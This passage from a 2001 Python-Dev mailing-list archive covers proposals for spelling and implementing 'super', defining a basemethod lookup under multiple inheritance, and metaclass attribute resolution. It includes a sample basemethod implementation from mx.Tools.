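Resuming after the class that defines the running method, rather than at `self.__class__.__bases__`, is what keeps `B.foo` from calling itself again when it runs on a `C` instance. Scanning the MRO for the code object stands in for the missing "where was this function defined" information; it is linear in the hierarchy size and gets confused if one function object is shared by several classes.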

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
In space, no one can hear you fart.


From mal at lemburg.com  Wed May  2 15:07:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 15:07:27 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <3AF0068F.32388C87@lemburg.com>

Greg Ward wrote:
> 
> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> ...

This doesn't work in Python since Python has multiple inheritance,
e.g. super in 

class A(B,C):
	def foo(self):
		super.foo()

is ambiguous.

I'd rather suggest adding a function for finding the basemethod
of a method. This is probably the most common task in this context.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 15:12:40 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 15:12:40 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook>

[Greg Ward]

> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)
> 
>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not
>     - walk the superclass tree starting at self.__class__.__bases__
Careful!
The search in the above context must start at MyClass.__bases__
which may not be the same as self.__class__.__bases__.

Thomas


From guido at digicool.com  Wed May  2 16:29:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:29:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400."
             <20010502085741.B515@gerg.ca> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>  
            <20010502085741.B515@gerg.ca> 
Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>

[Greg Ward, welcome back!]
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)

I'm sure that's everybody's favorite way to spell it!  It's mine too. :-)

> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)

Yes, that's about the only way it can be made to work.  The compiler
will have to (1) detect that 'super' is a free variable, and (2) make
it a local and initialize it with the proper magic.  Or, to relieve
the burden from the symbol table, we could make super a keyword, at
the cost of breaking existing code.

I don't think super is needed outside methods.

>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not

I don't think you can make that test, but making it a 'magic local'
as I suggested above would avoid the problem.

>     - walk the superclass tree starting at self.__class__.__bases__
>       (ie. skip self's class), looking for an object with the name
>       passed to this __getattr__() call -- 'foo'
>     - when found, return it
>     - if not found, raise AttributeError

Yup, that's the easy part. :-)

> The ability to peek at the calling stack frame is essential to this
> scheme, in order to fetch the "current object" (self) without needing to
> have it explicitly passed.  Is this as bothersome from C as it is from
> Python?

No, in C it's easy.  The problem is that there is no information in
the frame that tells you where the currently executing function was
defined -- all you have is the code object, which is
context-independent.
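For comparison, this is roughly how Python 3 ended up supplying the missing information: when a method mentions `super`, the compiler gives the function a hidden `__class__` cell holding the class it was defined in, and zero-argument `super()` combines that cell with the first argument found in the frame. This is Python 3 behaviour, not something available in the interpreter under discussion; the class names below are illustrative.

```python
class Base:
    def foo(self):
        return "Base.foo"


class Derived(Base):
    def foo(self):
        # Mentioning `super` makes the compiler add a hidden `__class__`
        # free variable to this function.
        return "Derived+" + super().foo()


code = Derived.foo.__code__
print(code.co_freevars)                                 # ('__class__',)
print(Derived.foo.__closure__[0].cell_contents is Derived)   # True
print(Derived().foo())                                  # Derived+Base.foo
```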

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 16:30:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:30:20 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200."
             <3AF0068F.32388C87@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
            <3AF0068F.32388C87@lemburg.com> 
Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com>

> This doesn't work in Python since Python has multiple inheritance,
> e.g. super in 
> 
> class A(B,C):
> 	def foo(self):
> 		super.foo()
> 
> is ambiguous.

I'm not sure what you mean.  The search is totally well-defined: first
search B for a foo method, then search C.

> I'd rather suggest adding a function for finding the basemethod
> of a method. This is probably the most common task in this context.

I've never heard of the concept of basemethod, but if I may venture a
guess, it would be the same definition as I give above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Wed May  2 15:38:42 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 2 May 2001 09:38:42 -0400 (EDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
	<200105020248.VAA30315@cj20424-a.reston1.va.home.com>
	<038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
	<200105021215.HAA31939@cj20424-a.reston1.va.home.com>
	<20010502085741.B515@gerg.ca>
	<200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <15088.3554.953359.757584@slothrop.digicool.com>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

  >> Since I don't know much about Python's guts, I can't say how
  >> implementable this is, but I like the spelling.  The semantics
  >> would be something like this (with adjustments to the reality of
  >> Python's guts):
  >>
  >> * 'super' is a magic object that only makes sense inside a 'def'
  >> inside a 'class' (at least for now; perhaps it could be
  >> generalized to work at class scope as well as method scope, but
  >> let's keep it simple)

  GvR> Yes, that's about the only way it can be made to work.  The
  GvR> compiler will have to (1) detect that 'super' is a free
  GvR> variable, and (2) make it a local and initialize it with the
  GvR> proper magic.  Or, to relieve the burden from the symbol table,
  GvR> we could make super a keyword, at the cost of breaking existing
  GvR> code.

  GvR> I don't think super is needed outside methods.

It seems helpful to clarify here, since this came up in conversation
at PythonLabs just the other day with the yield statement.

If we try to avoid keywords, we have to take the "well, I don't see
anyone assigning to this name" route.  If the compiler does not detect
any assignment to a nearly reserved word, like super, it would give
the use of that word special meaning.

There are a bunch of little problems.  A module could (not necessarily
should) be designed to have a global name poked into its namespace;
this would break, because the name would already have transmogrified
from a regular variable into a special one.  The use of exec or import
star would make it impossible for the word to take on its special
meaning.

So keywords really are a lot clearer, but they have the potential to
be incompatible.
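The "I don't see anyone assigning to this name" rule can be approximated with the `ast` module. A minimal sketch with a hypothetical helper name, `may_bind`; it covers the common binding forms but is not an exhaustive list (pattern-matching captures, for instance, are ignored). It treats `import *` and `exec` as "may bind anything". By construction it cannot see a global poked into the module from outside, which is exactly the first problem described above.

```python
import ast


def may_bind(source, name):
    """Hypothetical helper: conservatively report whether `name` might
    be bound in `source`.  If it might be, a compiler could not give
    `name` a special meaning there."""
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Name) and node.id == name
                and isinstance(node.ctx, (ast.Store, ast.Del))):
            return True              # name = ..., for name in ..., del name
        if (isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef,
                              ast.ClassDef)) and node.name == name):
            return True              # def name(): ... / class name: ...
        if isinstance(node, ast.arg) and node.arg == name:
            return True              # def f(name): ...
        if isinstance(node, ast.ExceptHandler) and node.name == name:
            return True              # except E as name: ...
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                if alias.name == "*":
                    return True      # import * may bind anything
                if (alias.asname or alias.name.split(".")[0]) == name:
                    return True
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id == "exec"):
            return True              # exec may bind anything
    return False


print(may_bind("def f(self):\n    return super.foo()\n", "super"))  # False
print(may_bind("from spam import *\n", "super"))                   # True
```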

Jeremy


From fredrik at pythonware.com  Wed May  2 16:00:55 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 2 May 2001 16:00:55 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff>

guido wrote:

> > class MyClass (BaseClass):
> >     def foo (self, arg1, arg2):
> >          super.foo(arg1, arg2)
>
> I'm sure that's everybody's favorite way to spell it!

not mine.  my brain contains far too much Python 1.5.2 code
for it to accept that some variables are dynamically scoped,
while others are lexically scoped.

why not spell it out:

    self.__super__.foo(arg1, arg2)

or

    self.super.foo(arg1, arg2)

or

    super(self).foo(arg1, arg2)

> Or, to relieve the burden from the symbol table, we could make super
> a keyword, at the cost of breaking existing code.

hey, how about introducing $ as a keyword prefix for newly introduced
keywords?

    $super.foo(arg1, arg2)

(this can of course be mapped to either of my previous suggestions;
"$foo" either means "self.foo" or "foo(self)"...)

and to save a little typing, only use it for keywords that start with
an "s" (should leave us plenty of expansion room):

    $uper.foo(arg1, arg2)

otoh, if "super" is common enough to motivate introducing magic objects
into python, maybe "$" should mean "super."?

    $foo(arg1, arg2)

and while we're at it, let's introduce "@" for "self.".

gotta run -- time for my monthly reboot /F


From guido at digicool.com  Wed May  2 17:03:37 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:03:37 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200."
             <3AEFCEBD.2E5979C9@lemburg.com>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
            <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com>

[me]
> > The best rule I can think of so far is that DictType.__dict__ gives
> > the *true* set of attribute descriptors for dictionary objects, and is
> > thus similar to Smalltalk's class.methodDict that Jim describes
> > below.  DictType.foo is a shortcut that can resolve to either
> > DictType.__dict__['foo'] or to an attribute (maybe a method) of
> > DictType described in TypeType.__dict__['foo'], whichever is defined.
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

[MAL]
> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that both a dictionary object (call it d) and its type
(DictType) have a __repr__ method: repr(d) returns "d", and
repr(DictType) returns "<type 'dictionary'>".

Given the analogy with classes, where str(x) invokes x.__str__() and
x.__str__() can also be called directly, it is not unreasonable to
expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent
to x.__class__.foo(x), the two forms above should also be equivalent
to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to
derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very
pragmatic point that once I allow subclassing from DictType, such a
subclass might very well want to override __repr__ to wrap the base
class __repr__, and the conventional way to reference that (barring
the implementation of 'super') is DictType.__repr__.  Direct
invocation of an object's own __repr__ method as x.__repr__() is much
less common.  The implementation of repr(x) can do the right thing,
which is to look for x.__class__.__dict__['__repr__'].
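In Python 3 the two readings no longer clash: `repr()` always looks `__repr__` up on the type of its argument, and attribute lookup on a class prefers the class's own dict over a non-data descriptor found in the metaclass. A short sketch of that behaviour, using Python 3's `dict` and `type` in place of DictType and TypeType (the `MyDict` subclass is illustrative):

```python
d = {"a": 1}

# repr() looks the method up on the *type* of its argument ...
assert repr(d) == type(d).__repr__(d)              # DictType.__repr__(d)
assert repr(dict) == type(dict).__repr__(dict)     # TypeType.__repr__(DictType)

# ... and attribute access on the class finds the per-instance method in
# dict.__dict__ rather than the metaclass's __repr__ in type.__dict__.
assert dict.__repr__ is dict.__dict__["__repr__"]
assert dict.__repr__ is not type.__dict__["__repr__"]


# So dict.__repr__ takes an explicit instance, as a subclass override needs:
class MyDict(dict):
    def __repr__(self):
        return "MyDict(%s)" % dict.__repr__(self)


print(repr(MyDict(a=1)))   # MyDict({'a': 1})
print(repr(dict))          # <class 'dict'>
```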

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance
yet.  DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes.

That's exactly how I solved it: type_getattro() implements the rule
quoted at the top.

> The only catch here is that currently instances and classes have
> control of whether and how to bind found functions as methods or not.
> We should probably change that to pass complete control over to the
> meta-class object and remove the special control flows currently found
> in instance_getattr2() and class_lookup().

Um, yeah, that's where I think this will end up causing more trouble.

Right now, if x is an instance, some attributes like x.__class__ and
x.__dict__ are special-cased in instance_getattr().  The mechanism I
propose removes the need for (most of) such special cases, and instead
allows the class to provide "descriptors" for instance attributes.
So, for example, if instances of a class C have an attribute named
foo, C.__dict__['foo'] contains the descriptor for that attribute, and
that is how the implementation decides how to interpret x.foo
(assuming x is an instance of C).  We may be able to access this same
descriptor as C.foo, but that's really only important for backwards
compatibility with the way classes work today.
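This is essentially how Python 3 instances work. A minimal sketch, with a hypothetical descriptor class `Described`: the descriptor stored in `C.__dict__['foo']` decides what `x.foo` means, `C.foo` hands back the descriptor itself, and `__dict__` and `__class__` turn out to be descriptors too rather than special cases.

```python
class Described:
    """Hypothetical data descriptor that stores its value in the
    instance dict under a private key."""

    def __set_name__(self, owner, name):
        self.key = "_" + name          # e.g. "_foo"

    def __get__(self, obj, objtype=None):
        if obj is None:
            return self                # C.foo: return the descriptor itself
        return obj.__dict__.get(self.key)

    def __set__(self, obj, value):
        obj.__dict__[self.key] = value


class C:
    foo = Described()


x = C()
x.foo = 42
print(x.foo)                                        # 42
print(C.__dict__["foo"] is C.foo)                   # True
print(type(C.__dict__["__dict__"]).__name__)        # getset_descriptor
print(type(object.__dict__["__class__"]).__name__)  # getset_descriptor
```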

> In general, I think that meta-classes should not expose their
> attributes to the class objects they create, since this causes
> way too many problems.

I agree.

> Perhaps I'm oversimplifying things here, but I have a feeling that
> we can go a long way by actually trying to see meta-classes as
> first class members in the interpreter design and moving all the
> binding and lookup mechanisms over to this object type. The special
> casing should then take place in the meta-class rather than its
> creations.

Yes, that's where I'm heading!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:02:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:02:41 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF01381.592AE31B@lemburg.com>

Guido van Rossum wrote:
> 
> > This doesn't work in Python since Python has multiple inheritance,
> > e.g. super in
> >
> > class A(B,C):
> >       def foo(self):
> >               super.foo()
> >
> > is ambiguous.
> 
> I'm not sure what you mean.  The search is totally well-defined: first
> search B for a foo method, then search C.

I thought you were talking about an abstract super class which is
how Java uses this term. 

Rereading some of the posts, I think you are indeed referring to
the method which foo overrides -- this is what I call basemethod
(since it is implemented in one of the base classes).
 
> > I'd rather suggest adding a function for finding the basemethod
> > of a method. This is probably the most common task in this context.
> 
> I've never heard of the concept of basemethod, but if I may venture a
> guess, it would be the same definition as I give above.

The basemethod can be defined as the first method of the same name
found in the inheritance tree using the standard Python lookup 
strategy (left-to-right, depth-first) when continuing the lookup search
at the node in the inheritance tree which defines the method querying
the basemethod.

In other words: you let Python continue the search for the method
as if it hadn't found the occurrence calling the basemethod()
API. Hmm, still not clear enough... better let Tim jump in here
(we've had a discussion about basemethod() some months or years
ago). Tim ?

Note that there are many ways of defining what a basemethod
is, due to the ambiguities that are caused by multiple inheritance
(e.g. the same base class may appear in different branches of the
inheritance tree).
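One reading of that definition, as a minimal Python 3 sketch (not the mx.Tools code): compute the classic depth-first, left-to-right order for the instance's class, find the class that defines the calling method, and continue the search from the next position. The names `classic_order` and `find_basemethod` are hypothetical, and the duplicate-base ambiguity is resolved, by assumption, by using the first occurrence of the defining class.

```python
def classic_order(klass):
    """Depth-first, left-to-right walk of klass and its bases
    (duplicates kept), i.e. the lookup order of classic classes."""
    order = [klass]
    for base in klass.__bases__:
        order.extend(classic_order(base))
    return order


def find_basemethod(instance_class, defining_class, name):
    """Hypothetical helper: continue the classic lookup of `name` on
    `instance_class` just after `defining_class` in that order."""
    order = classic_order(instance_class)
    start = order.index(defining_class) + 1   # first occurrence only
    for klass in order[start:]:
        if name in vars(klass):
            return vars(klass)[name]
    raise AttributeError(name)


class B:
    def foo(self):
        return "B.foo"


class C:
    def foo(self):
        return "C.foo"


class A(B, C):
    def foo(self):
        return "A.foo"


print(find_basemethod(A, A, "foo")(A()))   # B.foo
print(find_basemethod(A, B, "foo")(A()))   # C.foo
```

Note that on an `A` instance the basemethod of `B.foo` is `C.foo`, even though `B` does not inherit from `C`; this is one of the multiple-inheritance subtleties mentioned above.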

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 17:05:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:05:30 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200."
             <000d01c0d310$4ee127d0$0900a8c0@spiff> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>  
            <000d01c0d310$4ee127d0$0900a8c0@spiff> 
Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com>

> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
> 
> > Or, to relieve the burden from the symbol table, we could make super
> > a keyword, at the cost of breaking existing code.
> 
> hey, how about introducing $ as a keyword prefix for newly introduced
> keywords?
> 
>     $super.foo(arg1, arg2)
> 
> (this can of course be mapped to either of my previous suggestions;
> "$foo" either means "self.foo" or "foo(self)"...)
> 
> and to save a little typing, only use it for keywords that start with
> an "s" (should leave us plenty of expansion room):
> 
>     $uper.foo(arg1, arg2)
> 
> otoh, if "super" is common enough to motivate introducing magic objects
> into python, maybe "$" should mean "super."?
> 
>     $foo(arg1, arg2)
> 
> and while we're at it, let's introduce "@" for "self.".
> 
> gotta run -- time for my monthly reboot /F

LOL!  But you forgot the spelling of

    self.__super.foo(arg1, arg2)

which would pass in the class name that's the other necessary input to
a proper implementation of super. :-)
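Guido's spelling works through private-name mangling: inside `class D`, the compiler rewrites `self.__super` to `self._D__super`, which carries the class name. A minimal sketch in present-day Python 3, assuming a hypothetical metaclass `autosuper` that stores an unbound `super(cls)` object under that mangled name for every class it creates:

```python
class autosuper(type):
    """Hypothetical metaclass: stores super(cls) under the mangled name."""

    def __init__(cls, name, bases, namespace):
        super().__init__(name, bases, namespace)
        # Inside `class D`, `self.__super` compiles to `self._D__super`
        # (leading underscores of the class name are stripped first).
        setattr(cls, "_%s__super" % name.lstrip("_"), super(cls))


class A(metaclass=autosuper):
    def meth(self):
        return "A"


class B(A):
    def meth(self):
        return "B" + self.__super.meth()


class C(A):
    def meth(self):
        return "C" + self.__super.meth()


class D(C, B):
    def meth(self):
        return "D" + self.__super.meth()


print(D().meth())  # DCBA
```

Because the stored `super(cls)` object is a descriptor, looking it up through an instance binds it to that instance, so each `self.__super` call continues along `type(self).__mro__` after the class whose body contains it.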

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:04:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:04:29 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF013ED.8A190FE2@lemburg.com>

Here's an implementation of what I currently use to track down
the basemethod (taken from mx.Tools):

import sys, types
_basemethod_cache = {}

def basemethod(object,method=None,
               cache=_basemethod_cache,InstanceType=types.InstanceType,
               ClassType=types.ClassType):

    """ Return the unbound method that is defined *after* method in the
        inheritance order of object with the same name as method
        (usually called base method or overridden method).

        object can be an instance, class or bound method. method, if
        given, may be a bound or unbound method. If it is not given,
        object must be a bound method.

        Note: Unbound methods must be called with an instance as first
        argument.

        The function uses a cache to speed up processing. Changes done
        to the class structure after the first hit will not be noticed
        by the function.

        XXX Rewrite in C to increase performance.

    """
    if method is None:
        method = object
        object = method.im_self
    defclass = method.im_class
    name = method.__name__
    if type(object) is InstanceType:
        objclass = object.__class__
    elif type(object) is ClassType:
        objclass = object
    else:
        objclass = object.im_class

    # Check cache
    cacheentry = (defclass, name)
    basemethod = cache.get(cacheentry, None)
    if basemethod is not None:
        if not issubclass(objclass, basemethod.im_class):
            if __debug__:
                sys.stderr.write(
                    'basemethod(%s, %s): cached version (%s) mismatch: '
                    '%s !-> %s\n' %
                    (object, method, basemethod,
                     objclass, basemethod.im_class))
        else:
            return basemethod

    # Find defining class
    path = [objclass]
    while 1:
        if not path:
            raise AttributeError,method
        c = path[0]
        del path[0]
        if c.__bases__:
            # Prepend bases of the class
            path[0:0] = list(c.__bases__)
        if c is defclass:
            # Found (first occurrence of) defining class in inheritance
            # graph
            break
        
    # Scan rest of path for the next occurrence of a method with the
    # same name
    while 1:
        if not path:
            raise AttributeError,name
        c = path[0]
        basemethod = getattr(c, name, None)
        if basemethod is not None:
            # Found; store in cache and return
            cache[cacheentry] = basemethod
            return basemethod
        del path[0]
    raise AttributeError,'method %s' % name
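For comparison, the same "continue the search after the defining class" idea can be sketched against a class's `__mro__` in present-day Python 3. This is not the mx.Tools API: the three-argument signature `basemethod(obj, defclass, name)` is a hypothetical one chosen for clarity, and it returns plain functions (Python 3 has no unbound method objects).

```python
def basemethod(obj, defclass, name):
    """Return the function that `defclass.<name>` overrides for obj.

    The search continues in type(obj).__mro__ just after defclass and
    looks only at each class's own namespace (vars(klass)).
    """
    mro = type(obj).__mro__
    for klass in mro[mro.index(defclass) + 1:]:
        if name in vars(klass):
            return vars(klass)[name]
    raise AttributeError(name)


class B:
    def foo(self):
        return "B.foo"

class C(B):
    def foo(self):
        return "C.foo"

class D(C):
    def foo(self):
        return "D.foo"

d = D()
print(basemethod(d, C, "foo")(d))  # B.foo
print(basemethod(d, D, "foo")(d))  # C.foo
```

Passing the defining class explicitly is what lets the lookup start below C even when the object is a D instance.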
    
-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 16:06:39 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:06:39 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>

/F:
> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
IMO we still need to specify the class, and there we are:

     super(self, MyClass).foo(arg1, arg2)
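For reference, the built-in `super` that Python later gained takes exactly these two inputs, but in the opposite order: the class first, then the instance. A minimal Python 3 sketch, with `BaseClass` and `MyClass` filled in as assumptions:

```python
class BaseClass:
    def foo(self, arg1, arg2):
        return ("BaseClass.foo", arg1, arg2)


class MyClass(BaseClass):
    def foo(self, arg1, arg2):
        # Class first, then instance: the search starts after MyClass in
        # type(self).__mro__.  In Python 3, plain super() infers both.
        return super(MyClass, self).foo(arg1, arg2)


print(MyClass().foo(1, 2))  # ('BaseClass.foo', 1, 2)
```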

Thomas


From guido at digicool.com  Wed May  2 17:11:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:11:17 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200."
             <3AF01381.592AE31B@lemburg.com> 
